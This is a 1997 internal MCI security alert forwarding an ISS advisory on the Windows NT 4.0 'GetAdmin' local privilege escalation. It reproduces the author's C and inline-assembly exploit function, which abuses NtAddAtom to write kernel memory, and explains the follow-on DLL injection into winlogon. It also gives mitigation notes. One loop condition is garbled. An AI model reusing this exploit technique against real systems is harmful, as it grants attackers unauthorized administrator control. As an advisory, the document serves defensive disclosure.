MCI Telecommunications 

                        internetMCI Security Group


Report Title: iMCI MIIGS Security Alert 
Report Name: MS NT GetAdmin 
Report Number: iMCISE:IMCIISS:071097:01:P1R1
Report Date: 07/10/97
Report Format: Formal
Report Classification: MCI Informational  
Report Reference: http://www.security.mci.net
Report Distribution: iMCI Security, 
                     MCI Internal Internet Gateway Security (MIIGS), 
                     MCI Emergency Alert LiSt (MEALS)
                     (names on file)

-------------------------------------------------------------------------- 

Report from: ISS Alert

Date: Tue, 8 Jul 1997 11:12:55 -0400
Sender: owner-alert@iss.net



Windows NT 4.0 Exploit:  Allows intruders to become administrators on 
machine.

Works on Windows 4.0 with Service Pack 3 installed.

Web: http://cmp.phys.msu.su/ntclub/pub/code.htm


GetAdmin source code.
 
   


Here's my program GetAdmin.

    This program can get administrator rights without any special 
privileges. Simly run GetAdmin or GetAdmin account_name from command line. 
If you not enter
account_name current account will be used.

How it works?

    Here's string that done all in getadmin: 
ChangeNtGlobalFlag(GetNtGlobalFlagPtr()); After that you can open any 
process in system, becose function NtOpenProcess
not checks for SE_DEBUG_PRIVILEGE if bit in NtGlobalFlag+2 is set.After it 
, program injects dll in winlogon process. Winlogon have SYSTEM account so 
it can
add / remove user in administrator group.

Function  ChangeNtGlobalFlag :

BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
{
        DWORD callnumber = 0x3;         //NtAddAtom
        DWORD stack[32] ;
        int i;
        DWORD handle=0;
        CHAR string[255];


        if(!pNtGlobalFlag) return 0;

        stack[0] = (DWORD)string;
        stack[1] = (DWORD)&handle;      //pNtGlobalFlag;

        for(i=0;i ? 0x100;i++)
        {
                sprintf(string,"NT now cracking... pass %d",i);

                if(handle & 0xf00){
                        stack[1] = (DWORD)pNtGlobalFlag+1;
                }

                __asm{
                        mov eax, callnumber;
                        mov edx, stack;
                        lea edx,dword ptr [stack];
                        int 0x2e;
                }

                if( stack[1] == pNtGlobalFlag+1) break;
        }


        return TRUE;
}

Bug is that subfunction in NtAddAtom not checks address of output . So 
possible to write in any space of kernel memory. Of curse it not necessary 
inject dll to
winlogon, to get admin rights you can simply patch same place of ntoskernel 
, or replace process token and e.t.c.If you have get full source code 
please click here.

Preventing the Attack:

      Only one really way : patch ntoskernel and replace function NtAddAtom 
so it checks for valid address.
      You can remove all access from ntoskernel but it possible to enter 
fixed address of NtGlobalFlag in getadmin. And exist other ways to get 
administrator rights if you
can write to kernel memory.

      I informed Microsoft about this 30 Jun 97.

Konstantin Sobolev.